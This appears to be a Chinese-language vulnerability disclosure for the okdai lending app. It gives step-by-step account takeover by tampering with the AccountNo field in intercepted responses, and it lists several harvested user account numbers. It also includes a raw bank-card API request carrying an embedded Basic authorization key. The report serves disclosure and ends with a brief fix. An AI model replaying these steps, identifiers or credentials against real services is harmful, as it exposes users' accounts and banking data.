http://android.myapp.com/myapp/detail.htm?apkName=com.okdai
测试版本2.6.4
漏洞原因,APP鉴权依靠用户的AccountNo,多接口存在越权问题
用自己的账号登陆
登陆时,抓包,修改返回体内容中的AccountNo,这边改为:ACCT10000015353
ps:有时候需要改两次,才能进行跳转
例如
这样就能进入
ACCT10000015353 的账号了。可查看用户账户各项金额
可查询用户投资记录
获取用户的银行卡相关信息
发布奶酪
有一点需要说明,连续错误三次支付密码,账号将被冻结,影响用户使用
还能到K粉圈里溜达。
进行留言,查看消息等操作
K粉圈里抓包可以看到用户的AccountNo,看上哪个登哪个。
以上,接口均可通过burpsuite暴力获取信息。
在K粉圈里收集几条AccountNo,爆给你们看
ACCT10000068930
ACCT10000086464
ACCT10000027007
ACCT10000037902
ACCT10000065312
ACCT10000022941
ACCT10000019021
HUANGLI
以获取银行卡信息为例
POST http://app.okdai.com/api/Account/BankList HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Host: app.okdai.com
Connection: Keep-Alive
Authorization: Basic TW9iaWxlQXBpS2V5OmxzQXBLV0tWYjN2U0ZSNFZvNlFBZFJJcmF3PT0=
Accept-Encoding: gzip
AccountNo=ACCT10000015353&UserPhone=13333333333
解决方案:
权限控制,加会话